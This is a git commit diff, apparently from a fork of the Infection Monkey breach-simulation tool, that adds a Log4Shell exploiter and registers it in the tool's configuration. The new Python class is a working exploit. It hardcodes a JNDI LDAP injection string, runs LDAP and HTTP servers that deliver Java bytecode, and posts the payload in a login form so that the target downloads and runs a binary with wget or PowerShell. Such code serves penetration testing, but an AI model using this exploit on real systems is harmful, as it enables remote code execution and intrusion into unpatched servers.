forked from p34709852/monkey
TEMP: base implementation of the log4shell
This commit is contained in:
parent
fddaa16931
commit
41b97cb54a
|
@ -0,0 +1,98 @@
|
|||
import http.client
|
||||
import http.server
|
||||
import logging
|
||||
|
||||
import requests
|
||||
|
||||
from common.utils.exploit_enum import ExploitType
|
||||
from infection_monkey.exploit.log4shell_utils import LDAPExploitServer, build_exploit_bytecode
|
||||
from infection_monkey.exploit.tools.http_tools import HTTPTools
|
||||
from infection_monkey.exploit.web_rce import WebRCE
|
||||
from infection_monkey.model import POWERSHELL_HTTP_UPLOAD, WGET_HTTP_UPLOAD, VictimHost
|
||||
from infection_monkey.network.tools import get_interface_to_target
|
||||
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
LDAP_PAYLOAD = "${jndi:ldap://192.168.56.1:8080/dn=LinuxExploit}"
|
||||
|
||||
|
||||
class Log4jExploiter(WebRCE):
|
||||
_TARGET_OS_TYPE = ["linux", "windows"]
|
||||
EXPLOIT_TYPE = ExploitType.VULNERABILITY
|
||||
_EXPLOITED_SERVICE = "Log4j"
|
||||
LDAP_PORT = 8080
|
||||
CLASS_HTTP_SERVER_PORT = 1337
|
||||
URLS = ["http://192.168.56.101:8080/login"]
|
||||
|
||||
def __init__(self, host: VictimHost):
|
||||
super().__init__(host)
|
||||
self._client = None
|
||||
self._stop_http = True
|
||||
|
||||
def exploit_host(self):
|
||||
|
||||
paths = self.get_monkey_paths()
|
||||
# Create server for http download and wait for it's startup.
|
||||
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"])
|
||||
if not http_path:
|
||||
logger.debug("Exploiter failed, http transfer creation failed.")
|
||||
return False
|
||||
logger.info("Started http server on %s", http_path)
|
||||
|
||||
commands = {"windows": POWERSHELL_HTTP_UPLOAD, "linux": WGET_HTTP_UPLOAD}
|
||||
command = self.get_command(paths["dest_path"], http_path, commands)
|
||||
|
||||
java_class = self.build_java_class(command)
|
||||
class_http_server_ip = get_interface_to_target(self.host.ip_addr)
|
||||
self.start_java_class_http_server(class_http_server_ip, java_class)
|
||||
ldap = LDAPExploitServer(
|
||||
ldap_server_port=8080,
|
||||
http_server_ip=class_http_server_ip,
|
||||
http_server_port=self.CLASS_HTTP_SERVER_PORT,
|
||||
storage_dir=get_monkey_dir_path(),
|
||||
)
|
||||
ldap.run()
|
||||
|
||||
payload = {"username": LDAP_PAYLOAD, "password": "m0nk3y"}
|
||||
try:
|
||||
requests.post(Log4jExploiter.URLS[0], data=payload, timeout=5)
|
||||
except requests.ReadTimeout:
|
||||
logger.error("Couldn't send request to the vulnerable machine")
|
||||
return False
|
||||
finally:
|
||||
self._stop_http = True
|
||||
ldap.stop()
|
||||
return True
|
||||
|
||||
def build_java_class(self, exploit_command: str) -> bytes:
|
||||
return build_exploit_bytecode(exploit_command)
|
||||
|
||||
def upload_monkey(self, url, commands=None):
|
||||
pass
|
||||
|
||||
def exploit(self, url, command):
|
||||
pass
|
||||
|
||||
class HTTPHandler(http.server.BaseHTTPRequestHandler):
|
||||
|
||||
java_class: bytes
|
||||
|
||||
def do_GET(self):
|
||||
self.send_response(200)
|
||||
self.send_header("Content-type", "application/octet-stream")
|
||||
self.end_headers()
|
||||
logger.info("Sending payload class!")
|
||||
self.wfile.write(self.java_class)
|
||||
|
||||
def start_java_class_http_server(self, ip: str, java_class: bytes):
|
||||
# TODO run this on a separate thread
|
||||
self._stop_http = False
|
||||
Log4jExploiter.HTTPHandler.java_class = java_class
|
||||
|
||||
server = http.server.HTTPServer(
|
||||
(ip, Log4jExploiter.CLASS_HTTP_SERVER_PORT), Log4jExploiter.HTTPHandler
|
||||
)
|
||||
|
||||
while not self._stop_http:
|
||||
server.handle_request()
|
|
@ -17,6 +17,7 @@ BASIC = {
|
|||
"SmbExploiter",
|
||||
"WmiExploiter",
|
||||
"SSHExploiter",
|
||||
"Log4ShellExploiter",
|
||||
"ShellShockExploiter",
|
||||
"SambaCryExploiter",
|
||||
"ElasticGroovyExploiter",
|
||||
|
|
|
@ -42,6 +42,15 @@ EXPLOITER_CLASSES = {
|
|||
"link": "https://www.guardicore.com/infectionmonkey/docs/reference"
|
||||
"/exploiters/mssql/",
|
||||
},
|
||||
# TODO finish description
|
||||
{
|
||||
"type": "string",
|
||||
"enum": ["Log4ShellExploiter"],
|
||||
"title": "Log4Shell Exploiter",
|
||||
"safe": True,
|
||||
"info": "TODO: provide full info.",
|
||||
"link": "TODO: link to docs",
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": ["Ms08_067_Exploiter"],
|
||||
|
|
Loading…
Reference in New Issue